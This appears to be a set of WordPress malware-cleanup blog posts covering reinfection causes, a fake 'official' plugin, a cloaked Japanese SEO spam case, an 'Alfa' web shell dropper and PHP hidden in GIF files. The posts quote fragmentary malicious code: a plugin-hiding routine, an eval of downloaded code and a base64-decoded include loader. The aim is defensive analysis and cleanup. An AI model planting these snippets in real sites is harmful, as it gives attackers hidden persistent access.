6. Remove “Nulled” (Pirated) Themes and Plugins

If you installed free “premium” themes from sketchy sites, delete them immediately. They often contain hidden backdoors.

7. Install a Security Plugin & Rescan

Install Wordfence or Sucuri to block future attacks. Once you are done cleaning, run the scans again (VirusTotal, Sucuri SiteCheck) to ensure the site comes back 100% clean.

Step 3: Secure Your Site (Prevention)

Now that it’s clean, make sure hackers can’t get back in.
- Use a Web Application Firewall (WAF): Tools like Cloudflare, Wordfence, or Sucuri sit between visitors and your server to block attacks.
- Set Up Automatic Backups: Ensure your host is taking daily backups so you can restore instantly if this happens again.
- Enable Automatic Updates: Let WordPress and plugins update automatically to patch security holes.
- Strong Passwords & 2FA: Use a password manager and enable Two-Factor Authentication on all admin accounts.
- Install SSL (HTTPS): Ensure your SSL certificate is active and auto-renewing.
Step 4: Request Delisting from Google and Other Blacklists

Once your site is 100% clean, it’s time to ask to be removed.

For Google (The Priority)
1. Log into Google Search Console.
2. Go to Security & Manual Actions → Security Issues.
3. Confirm you’ve fixed the issues listed.
4. Click Request a Review.
What to write: Briefly explain what was infected, how you fixed it (removed files, updated plugins), and what you did to prevent reinfection. Be honest and specific.

For McAfee, Norton, and Others
- McAfee: Go to trustedsource.org, search your domain, and click “Submit a Dispute.”
- Norton: Visit Norton Safe Web, search your domain, and click “Submit Site for Review.”
- Avast/AVG/Bitdefender: Search for their specific “false positive” or “site review” forms and follow instructions.
Timeframe: How Long Does This Take?
- Google is fast. Reviews usually take 10–24 hours, though they allow up to 72 hours.
- Antivirus Vendors are slower. McAfee and Norton can take 5–10 business days because they often use manual review teams.
- Email Blacklists vary. Automatic removals happen in 1–7 days; manual reviews can take weeks.
Common Questions (FAQ)

“Why is my brand-new domain already blacklisted?”

You likely inherited the domain’s history or a bad IP address from a previous owner or shared hosting neighbor. You have to rebuild the reputation over time.

“Should I just buy a new domain?”

No. If you redirect a new domain to the same infected server, the new domain will get blacklisted too. You must clean the website. The only exception is if your IP is permanently burned and your host won’t help.

“Can Google get it wrong?”

Rarely, but yes. False positives happen. If you are 100% sure your site is clean (verified by multiple scanners), request a review and explain that you believe it is a false positive.

Tools You’ll Need (All Free or Low-Cost)
- VirusTotal (Diagnosis)
- Google Search Console (Google Delisting)
- Sucuri SiteCheck (Deep Scan)
- Wordfence (Security Plugin)
- Cloudflare (WAF)
- mxtoolbox (Email Blacklist Check)
January 29, 2026
Why WordPress Malware Keeps Coming Back (And How to Stop It Permanently)
Quick Fix: The “Reinfection Cheat Sheet”

If your WordPress site keeps getting hacked after cleaning, check these 5 hidden spots:
1. Check WP-Cron: Install a cron manager plugin. Look for events with random names (e.g., wp_update_core_sys) scheduled to run daily.
2. Hunt for “Ghost” Admins: Check the wp_users table in your database directly via phpMyAdmin. Hackers hide accounts from the dashboard.
3. Inspect wp-content/mu-plugins: This folder loads plugins automatically. If you didn’t create a file here, delete it.
4. Look for “Fake” Plugins: Check wp-content/plugins for folders that mimic real names (e.g., wordfence-security-pro-patch).
5. Replace Core Files: Don’t just clean. Delete wp-admin and wp-includes and upload fresh copies from WordPress.org.
Is your WordPress site stuck in a nightmare loop?

You scan the site, delete the infected files, and see the “All Clean” green checkmark. You think the battle is won. But then—often exactly at midnight or 24 hours later—the malware is back. The redirects start again. The hosting provider suspends your account.

This is the “Reinfection Loop,” and it is the single most frustrating problem for website owners.

I have cleaned thousands of hacked sites, and here is the hard truth: If your site keeps getting reinfected, you didn’t miss a file. You missed a mechanism.

Scanners like Wordfence or Sucuri are great tools, but they often miss “smart” malware that hides in the database, disguises itself as a legitimate plugin, or lives inside your cron jobs.

In this guide, I will show you exactly where the infection is hiding and how to break the cycle permanently.

🔑 Key Points: Why “Clean” Sites Get Hacked Again
- Scanners have blind spots: Most scanners look for known malware signatures. If a hacker writes a custom backdoor, the scanner sees it as “safe” code.
- The “Time Bomb” effect: Hackers use Cron Jobs to schedule a re-download of the virus. You delete the virus file, but the “alarm clock” (Cron) is still ticking.
- Hidden Entrances: Backdoors are often hidden in innocent-looking files like images (.jpg, .gif) or fake plugin folders.
Reason 1: The “Green Scan” Lie (Why Scanners Fail)

The biggest mistake I see clients make is trusting the “Green Shield.” You run a scan, it says “No Malware Found,” so you assume the site is safe.

Here is why that is dangerous.

Sophisticated malware developers know exactly how security plugins work. They write code that looks legitimate. For example, I recently analyzed a site where the malware was hiding inside a plugin that looked like a “compatiblity fix.” It was called wp-compat, and it had a backdoor that allowed the hacker to upload files whenever they wanted.

Read more: The wp-compat Plugin: The Hidden Backdoor in Your WordPress Site

Because the folder name looked “boring” and technical, the site owner ignored it. The scanner ignored it too, because the code inside used standard PHP functions—just used maliciously.

The “Official Plugin” Trick

Another common tactic is creating folders that sound like they belong to WordPress or popular plugins. I have seen malware hide in folders named wp-security-team or wordpress-core-update.

If you see a plugin in your file manager (cPanel) that does not appear in your WordPress Dashboard plugin list, it is almost certainly malware.

Read more: New Malware Alert: The Fake “Official” Plugin Attack

Reason 2: The “Midnight” Reinfection (Cron Jobs)

Does your malware come back at a specific time? Maybe every day at 12:00 AM or every 6 hours?

This is a classic sign of a Cron Job Hack.

WordPress has a built-in scheduling system called WP-Cron. It handles scheduled posts and update checks. Hackers love this feature. They inject a tiny line of code into your database that says:

“Every day at 00:00, go to this external URL, download the virus, and reinstall it.”

You can delete every malicious file on your server, but if you don’t delete this instruction from the database, the site will re-infect itself automatically. This is why you feel like you are chasing a ghost.

Read more: Why Malware Keeps Coming Back: Hidden Cron Job Hack Explained

Reason 3: Ghost Admins and Hidden Users

Sometimes, the “virus” isn’t a file at all. It’s a person.

When hackers break in, the first thing they do is create a backup Admin user for themselves. But they are smart—they add a snippet of code to functions.php that tells WordPress: “Do not show this user in the Users list.”

You look at your “Users” page, and you see only yourself. Meanwhile, the hacker logs in every night using their hidden account to re-upload the malware you just deleted.

To catch this, you cannot rely on the WordPress dashboard. You must look at the wp_users table in your database (using phpMyAdmin) or use a deep-scan method.

Read more: How to Find and Remove Hidden Admin Users in WordPress

Reason 4: Malware Hiding in Images (.jpg, .gif, .ico)

You might think, “It’s just a picture, it can’t hurt me.”

Wrong.

One of the sneakiest reinfection methods involves hiding PHP code inside image files. The hacker uploads a file named logo.jpg. If you open it, it looks like a blurry image or just code gibberish. But the server is tricked into treating this “image” as an executable program.

I recently found a backdoor hidden inside a .gif file. The scanner skipped it because scanners are configured to skip media files to save speed. This left a permanent open door for the hacker.

Read more: Can a JPG File Contain Malware? Uncovering the Fake Image Backdoor
Read more: The Hidden Threat: How Malware Hides in GIF Files

Reason 5: The .htaccess Redirection Trap

If your site is redirecting to gambling or pharmaceutical sites (especially on mobile devices), the problem is usually in your .htaccess file.

This file controls how your server directs traffic. Hackers inject rules here that say: “If the visitor is coming from Google, send them to getfix.win.”

The tricky part? They often add 500 lines of “white space” before the malicious code. When you open the file to check it, it looks empty or normal at the top. You have to scroll all the way down to find the virus.

Read more: The Ultimate Guide to Removing .htaccess Malware

The Step-by-Step “Deep Clean” Strategy

If you are tired of the reinfection loop, stop doing “quick scans.” You need a surgical removal process. Here is the checklist I use for my clients.

Step 1: Manual File Inspection

Don’t just rely on plugins. Log into your hosting via FTP or File Manager.
1. Go to wp-content/plugins. Open every folder. Do you recognize all of them? If you see wp-security-patch or wp-z-compat, delete them.
2. Go to wp-content/uploads. Look for any PHP files hiding in your year/month folders. Uploads should never contain PHP files.
Read more: Hidden Backdoors & Fake Plugins: How Hackers Live in Dashboard

Step 2: Clean the Database

Malware strings often hide in the wp_options table (especially the siteurl or home rows if you have redirects).
1. Open phpMyAdmin.
2. Search for <script> or eval( or base64.
3. Check specifically for executable files that shouldn’t be there.
Read more: Removing Hidden Executable Files (Case Study)

Step 3: Check Core Files (functions.php & wp-config.php)

The functions.php file in your active theme is the #1 spot for “Ghost Admin” code. Open it and look for strange code at the very top or very bottom.

Also, check wp-config.php. Hackers sometimes modify this file to point to a different database or include a malicious file before WordPress even loads.

Read more: Found Suspicious Code in functions.php? The Ghost Admin Hack

Step 4: The “Nuclear” Option (Fresh Core Install)

If you can’t find the file, replace the system.
1. Download a fresh ZIP from WordPress.org.
2. Delete wp-admin and wp-includes from your server.
3. Upload the fresh copies.
Note: Do not delete wp-content or wp-config.php.

Post-Cleanup: How to Lock the Door

Cleaning the malware is only 50% of the job. You must close the holes they used to get in.

1. Change Your Salts

WordPress uses “Salts” to encrypt login cookies. If a hacker has a valid cookie, they can stay logged in even if you change your password. You must update your Security Keys in wp-config.php to force-logout everyone (including the hacker).

2. Update Everything

A vulnerable plugin is an open window. If you are running an old version of Elementor or a shady “nulled” theme, you will be hacked again in 24 hours.

3. Setup Backups (Off-Site)

If this happens again, you need a clean version to revert to. Do not store backups on the same server! Use a tool like UpdraftPlus to send backups to Google Drive or Dropbox.

Read more: How to Back Up Your WordPress Site with UpdraftPlus (2025 Guide)

4. Checklist Review

I have compiled a complete 60-point checklist of signs that your site is still infected. Go through this list one by one.

Read more: 60 Clear Signs Your WordPress Site is Hacked
Read more: What to Do After Fixing a Hacked Site (Real Cleanup Checklist)

FAQ: Questions My Clients Always Ask

Q: Why does malware come back every day at the same time?

A: This is almost certainly a Cron Job or a scheduled external script hitting your site. The malware isn’t “living” on your site; it is being “re-delivered” by a script. Check your Cron events immediately.

Q: Can a “Factory Reset” remove malware?

A: Yes and no. If you reset the files but keep the database, the infection (which often lives in the database) will survive. You must clean both files and the database.

Q: Why didn’t Wordfence/Sucuri detect it?

A: Scanners look for “Signatures” (fingerprints). If the hacker wrote a brand new, custom piece of code (like the Fake Security Team Malware), it has no fingerprint yet. Scanners are helpful, but they are not human.

Q: Is it safe to use “Nulled” plugins?

A: Never. 99% of “free pro plugins” contain pre-installed backdoors. This is the #1 cause of reinfection.

Still Can’t Stop the Reinfection?

If you have followed this guide, checked the cron jobs, replaced the core files, and the malware still comes back, you likely have a “root level” infection or a complex database injection.

Some malware is designed to be impossible to remove without reading the raw code logs. If you are losing money every minute your site is down, you might need a specialist to dig deeper than a plugin can.

Read my case study: I Found a Hidden Backdoor in a Client’s Site (Real Story)

Don’t let hackers win. Be thorough, be paranoid, and check every single file.
January 20, 2026
New Malware Alert: The “Fake Official” Plugin Attack (wp-kludge-allow & Variants)
If you are reading this, you likely found a strange folder in your wp-content/plugins directory with a name that sounds technically impressive but meaningless—something like wp-kludge-allow, wp-analyzer-philosophy, or wp-systematize-marketplace.

You might be wondering: “Did I install this? Is it a core WordPress file?”

The answer is no. You are looking at a sophisticated piece of malware designed to impersonate an official WordPress component. We call this the “Fake Official” Plugin Attack.

Here is a breakdown of what this malware does, why it is dangerous, and how to remove it.

The Disguise: “Official WordPress Plugin”

Most WordPress malware tries to be invisible. This variant takes a different approach: Audacity.

If you open the main PHP file inside one of these folders (e.g., wp-kludge-allow/index.php), you will see a file header that looks legitimate:
```
/*
Plugin Name: WP Kludge Allow
Description: Official WordPress plugin
Author: WordPress
Version: 12.7.0
*/
```
The attackers explicitly label it as an “Official WordPress plugin” authored by “WordPress”. They even assign it a high version number (like 12.7.0) to make it appear stable and essential.

This is a Social Engineering tactic. The goal is to make a developer or site owner hesitate before deleting it, fearing they might break the site by removing a “core” feature.

How It Works: The “Invisible” Plugin

You might ask, “If this is a plugin, why didn’t I see it in my dashboard?”

This is the malware’s primary trick. It contains specific code designed to scrub its own existence from your WordPress admin panel while still running in the background.

1. Ghost Mode (Hiding from the Dashboard)

The malware hooks into the pre_current_active_plugins action. Just before WordPress displays your plugin list, the malware runs a function (often named rhi_cbx or similar) that finds its own filename in the list and unsets it.
```
// Malware code that removes itself from the list table
if (in_array($key, $h)) {
    unset($wp_list_table->items[$key]);
}
```
This ensures that even though the plugin is active, it is completely invisible on the Plugins > Installed Plugins page.

2. The Backdoor (Direct Access)

This malware has a “split personality” controlled by a simple check: if (defined('ABSPATH')).
- If loaded by WordPress: It hides itself and stays dormant to avoid detection.
- If loaded directly (by a hacker): It executes a malicious payload.
If a hacker accesses the file directly in a browser (e.g., yoursite.com/wp-content/plugins/wp-kludge-allow/index.php), the script bypasses WordPress security and runs an obfuscated function named fif.

In the samples we analyzed, this function often decodes a string to point to your .htaccess file and attempts to include it. This suggests the attackers have hidden malicious PHP code inside your .htaccess file, using this “plugin” as the trigger to execute it.

Indicators of Compromise

Check your /wp-content/plugins/ directory via FTP or your hosting File Manager. If you see folders with generated “nonsense” names, your site is likely infected. Common names seen in this attack wave include:
- wp-kludge-allow
- wp-analyzer-philosophy
- wp-systematize-marketplace
- wp-plugin-hostgator (mimicking legitimate hosting tools)
How to Fix It
1. Delete the Folders: These are not core files. You can safely delete the entire folder (e.g., wp-kludge-allow).
2. Check Your .htaccess: Since the malware attempts to load this file, check your root .htaccess file for hidden PHP code or malicious directives.
3. Scan for Others: This malware often drops multiple copies with different names. Ensure you check all folders in your plugins directory.
4. Change Passwords: As with any compromise, reset all admin passwords and salt keys immediately.
Have you found a folder with a different name that follows this pattern? Drop the name in the comments below to help others identify this malware.
January 15, 2026
How I Removed 50,000+ Spam URLs and Saved a Hacked Website (The Ultimate Guide)
If you look at your Google Search Console coverage report, you expect to see a steady line of ‘Valid’ pages. You definitely don’t want to see what my client saw last Tuesday.
- Valid Pages: 142
- Spam Pages: 49,800+
In the blink of an eye, a massive injection of spam URLs had drowned out their legitimate content. The client was facing a potential Google penalty that could take years to recover from. I had to act fast. Here is the exact “Scorched Earth” protocol I used to fix it in just 72 hours.

Introduction: Why Traditional GSC Removal Fails Massive Attacks

Last year, I documented a massive cleanup effort in my post: Recovering from SEO Spam: How I Cleared 242,000 Japanese Spam Pages. In that case study, I relied heavily on the Google Search Console (GSC) Removal Tool.

While that method works for moderate infections, it has significant limitations when dealing with a massive attack. You can typically only submit about 1,000 URLs per day manually. When you are facing an aggressive attack of 50,000 or 100,000 auto-generated pages, the GSC removal tool simply cannot keep up. The math doesn’t work; you cannot wait 50 days to save your business while your reputation bleeds out in the search results.

Today, I am going to show you a more advanced, aggressive strategy. I call it the “410 Gone” Protocol. Instead of politely asking Google to temporarily hide the URLs, I force Google to de-index them permanently.
Need Emergency Help?

If your site is currently infected and you don’t have the technical skills to clean it safely, do not risk breaking your site further. Check out my specialized services:
- Japanese SEO Spam Removal Service
- Complete WordPress Malware Removal & Hardening
Chapter 1: Diagnosing the Japanese Keyword Hack & Finding Patterns

The Japanese Keyword Hack (also known as the Japanese Symbol Hack or SEO Spam) is particularly nasty because it is often “cloaked.” This means the hacker writes a sophisticated script that detects who is visiting the website.

If a human visitor (like you or your customers) goes to the site, the script shows the normal, clean website. However, if a search engine bot (like Googlebot) visits, the server delivers the malicious Japanese spam content. To the client, the site looked fine. To Google, the site had turned into a Japanese casino affiliate farm.

Step 1: Using Search Operators to Identify Spam Patterns

The fastest way to confirm the infection is to ask Google exactly what it has indexed. I typed this simple command into the Google search bar:
```
site:example.com
```
The Result: I saw thousands of pages with title tags written in Kanji characters, promoting “No Deposit Bonus Casino” and “Fake Luxury Watches.” The URLs followed specific patterns, often ending in random numbers, such as /detail/837492837 or hidden inside a /pages/ directory.

Step 2: Harnessing the Google Search Analytics API for Bulk Data

For massive volumes, the standard Google Search Console interface is not enough. To verify exactly which spam pages were active, I utilized the API to pull up to 25,000 rows of pages and queries at once.

1. Access the API Interface

I visited the Google Search Analytics API explorer and selected the “Try it now” option to access the testing tool.

2. Configure the Query

I switched to full-screen view for easier navigation and input the client’s site URL. In the Request Body, I pasted the following JSON configuration to fetch the maximum amount of data:
```
{
  "startDate": "2023-01-01",
  "endDate": "2025-02-19",
  "dimensions": ["QUERY", "PAGE"],
  "rowLimit": 25000
}
```
3. Authenticate and Export the “Kill List”

I enabled OAuth 2.0 authentication and executed the query. After receiving a 200 OK response, I copied the raw JSON data and used Konklone’s JSON to CSV tool to convert it into a readable spreadsheet.

I filtered this massive CSV file for the specific spam patterns I identified earlier (casino keywords, .html files in /pages/, etc.). This gave me a precise list of nearly 6,000 unique bad URLs that were currently draining the client’s server resources.

Chapter 2: The “First Aid” Response: Using GSC Removals (Triage)

Before I implement the “Scorched Earth” permanent fix, I can use Google Search Console’s built-in tools for immediate, temporary relief. This is like putting a tourniquet on a wound while preparing for surgery.

If the hacker created obvious directories (like /odr/ or /pages/), I can use the “Removals” tool in GSC to hide that entire directory instantly.

How to perform a Prefix Removal:
1. Go to Google Search Console > Removals.
2. Click New Request.
3. Choose “Remove all URLs with this prefix”.
4. Enter the spam directory pattern, for example: https://example.com/odr/
5. Click Submit.
This will quickly hide thousands of URLs matching that pattern from Google search results within a few hours. However, remember that this is temporary (about 6 months) and does not actually de-index the pages; it just hides them.

Chapter 3: The SEO Strategy – Why “410 Gone” beats “404 Not Found”

Most website owners make a fatal mistake at this stage: they simply delete the hacked files or use a security plugin to “clean” the site. When you simply delete a file, your server sends a 404 Not Found code to Google.

The Problem with 404 Errors during Cleanup

When Googlebot crawls a URL and receives a 404 error, its logic is: “Maybe this page is just missing temporarily. It might come back. I will keep it in the index for now and check again next week.”

This “Soft Fade” approach means your spam links can stay in search results for months, continuing to hurt your brand reputation.

The Solution: The “410 Gone” Status

I chose a different HTTP status code: 410 Gone. A 410 code sends a very specific, final message to search engines: “This page is dead. It was deleted on purpose. It is never coming back. Remove it from the index immediately.”

This was my primary strategy for the 50,000 pages. I didn’t want to just hide the spam; I wanted to kill it instantly.

Chapter 4: Executing the “410 Protocol” (Two Methods)

I need to implement a system that intercepts any request for a spam URL and serves a 410 error. There are two ways to do this: the “Safe” way (Plugin) and the “Power User” way (Server). Here is how I approach both.

Method A: The “Safe” Way using a WordPress 410 Plugin

If editing server files scares you (and it should, one wrong move breaks your site), you can use a WordPress plugin to handle the 410 logic. I recommend the free and powerful “Redirection” plugin.

While this method is safer, it is slower because WordPress has to load fully to process the request, meaning your server still takes a hit from bot traffic.
1. Install and activate the Redirection plugin.
2. Go to Tools > Redirection.
3. Click “Add New”.
4. In the Source URL field, enter the Regex pattern I found in Chapter 1. For example, to block the 15-digit product IDs: ^/detail/([0-9]{10,15})$
5. Change the “URL Options / Regex” dropdown to Regex.
6. Change the “Target URL” dropdown to Error (410 Gone).
7. Click “Add Redirect”.
Now, any URL matching that pattern will return a 410 error via WordPress.

Method B: The “Power User” Way (.htaccess Server-Side Fix)

For this specific client, with 50,000 pages, I needed maximum speed and minimum server load. I bypassed WordPress entirely and edited the .htaccess file on the Apache server. This blocks the bots at the door before WordPress even loads.

Here is a simplified version of the code I deployed to the top of the .htaccess file:
```
<IfModule mod_rewrite.c>
RewriteEngine On

# 1. Block Casino Keywords
# If the URL contains gambling terms, send a 410 GONE error immediately.
RewriteRule .*casino.* - [R=410,L]
RewriteRule .*slot.* - [R=410,L]
RewriteRule .*poker.* - [R=410,L]

# 2. Block the Numeric Product ID Pattern (The massive 40k pages)
# This targets the fake product pages like /detail/123456789
RewriteRule ^detail/([0-9]{10,15})$ - [R=410,L]

# 3. Block Malicious Directories
RewriteRule ^odr/.* - [R=410,L]
RewriteRule ^mbr/.* - [R=410,L]
RewriteRule ^pages/.*\.html$ - [R=410,L]
</IfModule>
```
The Result: Instantly, all 49,000+ spam links stopped working. Anyone (or any bot) trying to visit them received a hard “410 Gone” error. This immediately stopped the server overload.

Chapter 5: The “Reverse Psychology” Sitemap Strategy

Now that my firewall (plugin or .htaccess) is active, I need Google to see it. Usually, a sitemap is used to tell Google about your good pages. I did the opposite.

I created a specialized Spam Sitemap (named sitemap-spam.xml) containing thousands of the bad URLs I identified via the API. I then submitted this sitemap to Google Search Console.

Why would I submit a sitemap of bad links?
1. I am “inviting” Google to crawl these specific links immediately.
2. Googlebot visits the link.
3. The 410 Firewall I built in Chapter 4 hits it with a 410 Gone error.
4. Googlebot updates its database: “This URL is permanently gone. De-index it.”
By feeding the beast the poisoned links, I accelerated the cleanup process from months to days.

(For a deeper dive into how malware hides links in the first place, read my guide on Hidden Links Malware: The Simple Guide to Detection).

Chapter 6: Database Forensics & The “Good Page” Infection

The hack didn’t just create new pages; it infected real ones. I found that the client’s legitimate “Services” page was ranking, but the title tag in the search results was in Japanese.

I opened the database via phpMyAdmin and checked the wp_postmeta table. The hacker had injected a script that overwrote the Rank Math SEO Title settings with Japanese text. I ran a SQL query to clean these specific rows and regenerate the correct English titles.

Note: This injection method is very similar to the logic used in Pharma hacks. You can read more about that specific variation here: WordPress Pharma Hack Fix Guide.

Chapter 7: The Results – De-indexing 50k Pages in 72 Hours

The combination of the 410 protocol and the “Kill List” Sitemap worked perfectly.
- Day 1: The server CPU usage dropped by 80% as the bots were blocked at the door.
- Day 2: Google Search Console showed a massive spike in “410” errors (which is exactly what I wanted) and the number of indexed spam pages began to plummet.
- Day 3: The Japanese characters disappeared from the main search results for the client’s brand name. The correct English titles reappeared.
Chapter 8: WordPress Security Hardening to Prevent Re-infection

Cleaning a hack is pointless if you get hacked again next week. I implemented a strict Security Hardening plan for the client:
1. Change All Passwords & Salts: I changed the WordPress Salt Keys in wp-config.php. This instantly logged out every user currently logged in (including the hacker).
2. Two-Factor Authentication (2FA): I enforced 2FA on all administrator accounts.
3. Disable File Editing: I added define( 'DISALLOW_FILE_EDIT', true ); to the config file, stopping anyone from editing PHP files from the dashboard.
4. Block PHP in Uploads: I blocked PHP execution in the /wp-content/uploads/ folder to prevent malicious scripts from running disguised as images.
Frequently Asked Questions (FAQ) About Japanese SEO Spam

What exactly is the Japanese Keyword Hack?

It is a type of SEO spam where hackers compromise a website and use scripts to auto-generate thousands of new pages. These pages usually contain Japanese text selling counterfeit goods, gambling sites, or illegal products. They leverage your site’s good reputation to rank these spam pages in Google.

Why do I only see the spam on Google, but my site looks normal to me?

This is called “Cloaking.” The hacker’s script detects the visitor’s “User-Agent.” If it detects a human visitor, it shows the normal website. If it detects a search engine bot (like Googlebot), it serves the malicious Japanese content. This delays detection by the site owner.

Can’t I just use a security plugin like Wordfence to fix it?

Security plugins are excellent for detection and blocking known malware files. However, for massive SEO spam injections involving tens of thousands of URLs and database corruption, plugins often struggle to clean up the mess efficiently or handle the complex de-indexing process required with Google.

Why is “410 Gone” better than just deleting the files (404 Not Found)?

When you delete a file, it returns a “404 Not Found” error. Google interprets a 404 as temporary, meaning it will keep checking that URL for weeks or months to see if it comes back. A “410 Gone” error tells Google explicitly that the page is permanently deleted and should be removed from the index immediately. It is much faster for SEO recovery.

How long does it take for Google to remove the Japanese characters?

If you only use standard methods, it can take 3-6 months for 50,000 pages to fade out. Using the aggressive “410 Gone” firewall method described in this case study, I typically see significant de-indexing start within 72 hours, with the majority of spam gone within 2-4 weeks.

Conclusion: Prevention is Better than Cure

Recovering from 50,000 spam pages takes high-level technical skill. If you make a small mistake in the .htaccess file, you can take your entire website offline instantly.

If you see Japanese characters in your search results, do not wait. The longer these links exist, the more damage they do to your domain authority and brand trust.

Need an Expert to Fix This For You?

I specialize in fixing complex WordPress malware infections that standard plugins cannot handle.

Fix My Hacked Site Now

Or explore my full WordPress Malware Removal Services.
January 15, 2026
I Found a Hidden “Backdoor” in a Client’s WordPress Site
If you own a WordPress website, you probably worry about security. You should.

Recently, a client came to me because their website was acting strange. It wasn’t completely broken, but something felt “off.” They asked me to take a look. What I found was a perfect example of how modern hackers hide inside your website files without you even noticing.

I wanted to share this discovery to show you what malware looks like and why you need a professional to keep your site clean.

The Discovery: Innocent Looking Files

When I logged into the client’s file manager (hosted on DreamHost), I navigated to the /wp-content/ folder. This is where your themes and uploads live.

At first glance, everything looked normal. But then I saw three files that didn’t belong there:
- fa.php
- fazel.php
- trigger.txt
To a regular person, fa.php might look like a font file (like FontAwesome), and trigger.txt looks harmless. But for a developer, these files in this specific location are a massive red flag.

Analyzing the Malware: How It Works

I opened the code to see what it was doing. I won’t bore you with complex technical jargon yet, but here is what this script does in plain English.

The hacker created what we call a “Loader” or a “Dropper.” Think of this malware like a remote-controlled lock on your front door. The hacker doesn’t live in your house, but they have a key that lets them in whenever they want.

1. The “Fetcher”

The code contains a function called geturlsinfo. Its job is to go out to the internet and download instructions from a specific URL. In this case, the malware was trying to download a hacking tool from a GitHub page to gain control over the server.

2. The “Trigger”

The malware uses the trigger.txt file as an On/Off switch. The code checks if the text file has the word “active” inside it. If it does, the virus runs. If you try to delete the virus but forget the trigger file, it can sometimes be used to restart the infection.

3. The “Execution” (The Dangerous Part)

The scariest line in the code is this one:
```
eval('?>' . $a);
```
In simple terms, this command tells your website: “Whatever code you just downloaded from the hacker’s URL, run it immediately as if it were part of the website.”

Technical Breakdown: Anatomy of the “Alfa” Dropper

For the tech-savvy business owners or developers reading this, I want to explain exactly why this specific script is so dangerous. It wasn’t just a random bug; it was a sophisticated tool designed to bypass standard security firewalls.

Here is what the code was actually doing behind the scenes:

1. It Mimics a Real Human (Evasion Tactics)

Most basic security firewalls block automated bots. The hacker knew this. Inside the code, I found this line:
```
CURLOPT_USERAGENT, "Mozilla/5.0..."
```
This forces the malware to pretend it is a legitimate Firefox browser running on Windows. To a security log, the malicious connection looks just like a regular person browsing the web, allowing it to slip past basic defenses.

2. It Has “Backup Plans” (Resilience)

Malware developers know that every server is configured differently. This script uses a “Polyfill” technique. It checks for three different ways to connect to the internet:
- Method A: curl_exec (The preferred method)
- Method B: file_get_contents (If A fails)
- Method C: fopen (If B fails)
This ensures that no matter how strictly your server is locked down, the virus tries every possible door to download its payload.

3. The Payload: The “Alfa” Web Shell

The script was trying to fetch a file named alfa.txt. In the cybersecurity world, “Alfa” is a notorious Web Shell.

Once this shell is loaded via the eval() command, it creates a visual interface for the hacker. Imagine Windows Explorer, but for your website files. It gives them the power to edit your configuration files, steal database passwords, and bypass the WordPress login screen entirely.

How I Fixed It (And How I Can Help You)

Cleaning a hacked site isn’t just about clicking “delete” on the bad files. If you don’t fix the hole they used to get in, they will just come back tomorrow.

Here is the process I used to secure this client’s site:
1. Code Analysis: I identified the malicious logic to understand exactly what the hacker was trying to do.
2. Cleanup: I safely removed fa.php, fazel.php, and trigger.txt, and cleaned up the core WordPress files they had tampered with.
3. Backdoor Sweep: I scanned the rest of the database and folders to ensure they didn’t leave other “keys” hidden elsewhere.
4. Patching: I updated all plugins and the WordPress core to close the security holes.
Is Your Website Safe?

Most business owners don’t know they are hacked until it is too late—when Google blacklists their site or their host shuts them down.

Don’t wait for a disaster.

If you see strange files in your hosting panel, or if your site is running slow, let me take a look. I offer professional WordPress security and maintenance services to keep your business safe.

Contact me today for a Security Audit »
January 14, 2026
The Hidden Threat: How Malware Hides in GIF Files on WordPress
When you think of a hacked website, you typically imagine defaced homepages, redirects to spam sites, or locked admin panels. You rarely suspect the innocent-looking images sitting in your media folders.

However, a dangerous and rising trend in WordPress cybersecurity involves hackers hiding malicious backdoors inside files named as images (like .gif or .jpg). If your security scanner recently flagged an “Unknown file in WordPress core” with a name like w-feedebbbbc.gif or xit-3x.gif, do not ignore it.

That “image” is likely a dangerous backdoor. Here is how this attack works, why hackers use it, and how to clean it up.

The Deception: It’s Not Actually a GIF

In a standard scenario, if a hacker tries to upload a malicious .php script to a secured WordPress site, firewalls and built-in filters will often block it immediately. To bypass these defenses, attackers use a technique called Extension Spoofing.

They rename their malicious PHP scripts to .gif. To a human or a basic file filter, image.gif looks harmless. But to the server, a file is just data. If the attacker can trick the server into treating that “image” as a script, the server will execute the code hidden inside.

Anatomy of the Attack

Based on recent malware samples (specifically the “Jue Jiang” or “Open Cache” variants), this attack follows a sophisticated three-step infection process:

1. The “Drop”

The malware creates a file with a deceptive name, such as wp-includes/images/xit-3x.gif. Despite the extension, this file contains obfuscated PHP code—often a Webshell that gives the hacker full control over your files. The code often includes a fake GIF header (like GIF89a) at the very top to trick scanners into thinking it is a valid image preview.

2. The Core Infection

The malware doesn’t stop at creating the fake image. It scans your legitimate WordPress core files to find one that runs on every page load. A common target is:

wp-includes/general-template.php

3. The “Include” Trigger

This is the most dangerous part. The malware injects a tiny, invisible line of code into that core file. It looks something like this:

@include base64_decode("...path to gif...");

This command tells WordPress: “When you load the website template, also load and run whatever code is hiding inside that GIF file.” Because PHP’s include function generally ignores file extensions, the server executes the malicious GIF as code, granting the attacker persistent access to your site.

How to Identify This Infection

How do you know if your “images” are actually malware?
- Security Scans: Tools like Wordfence are excellent at detecting this. Look for warnings that say “Unknown file in WordPress core” located in folders like /wp-includes/images/.
- File Type Mismatch: If you look at the file details in your scanner or file manager, check the Type. If it says “File” or “PHP Script” instead of “Image,” it is malicious.
- Permissions: This specific malware often sets the file permissions to 444 (Read Only). This prevents you from easily deleting the file via the WordPress dashboard.
How to Clean and Fix

If you find a malicious GIF backdoor, follow these steps carefully. Do not simply delete the GIF file first.
1. Check Core Integrity: Because the malware modifies legitimate core files (like general-template.php) to load the GIF, deleting the GIF first might break your site (causing a Fatal Error because the core file is trying to load a missing file).
2. Reinstall WordPress Core: The safest way to remove the infection from core files is to replace them with fresh copies. Go to Dashboard > Updates and click “Re-install Now”. This overwrites the infected PHP files with clean ones from WordPress.org.
3. Delete the Fake Images: Once the core files are clean, you can safely delete the malicious .gif files identified by your scanner.
4. Reset Secrets: Force a logout for all users by changing your salt keys in wp-config.php and reset all administrator passwords.
Summary

Files ending in .gif, .png, or .jpg are not always safe. By disguising PHP code as images and modifying core system files to load them, hackers can maintain long-term access to your website while evading basic detection.

Regular file integrity monitoring and keeping your security plugins active are your best defense against these hidden threats.
January 13, 2026